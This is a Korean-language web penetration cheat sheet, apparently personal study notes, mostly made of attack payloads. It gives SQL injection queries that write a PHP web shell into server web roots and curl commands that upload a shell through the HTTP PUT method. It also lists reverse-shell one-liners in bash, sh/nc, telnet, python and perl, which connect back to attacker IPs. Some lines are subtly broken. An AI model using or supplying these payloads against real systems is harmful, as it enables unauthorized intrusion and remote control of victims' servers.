웹 침투 (SQL Injection, PUT, ReverseShell)

Manual SQL Injection Cheat sheet

http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

https://sushant747.gitbooks.io/total-oscp-guide/sql-injections.html

https://guide.offsecnewbie.com/5-sql

Load File
http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"<?php echo
shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'

Write File
http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"<?php echo
shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'

http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"<?php echo
shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'

 

CURL을 이용한 매소드 취약점 공략
curl -v -X OPTIONS http://192.168.97.130/test
curl -v -X put -d '<?php system($_GET["cmd");?>' http://192.168.0.105/test/shell.php

기능있는 쉘을 업로드할 생각이라면
=> 버프를 통해 소스코드를 붙이는게 편하다.

접근된 폴더에 www사용자가 쓰기 권한이 없어서 nc다운로드를 못할 경우
>시스템에 설치되어 있는 언어를 이용해서 리버스 쉘을 연결할 수 있다.

 

 

리버스 쉘 코드

 

파이썬

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);

>그 밖에 펄 등 다른 언어를 이용해서도 다운로드 가능

# bash
bash -i >& /dev/tcp/192.168.100.113/4444 0>&1

#sh
rm -f /tmp/p; mknod /tmp/p p && nc <attacker-ip> 4444 0/tmp/p

#telnet
rm -f /tmp/p; mknod /tmp/p p && telnet <attacker-ip> 80 0/tmp/p

# python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# perl 
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'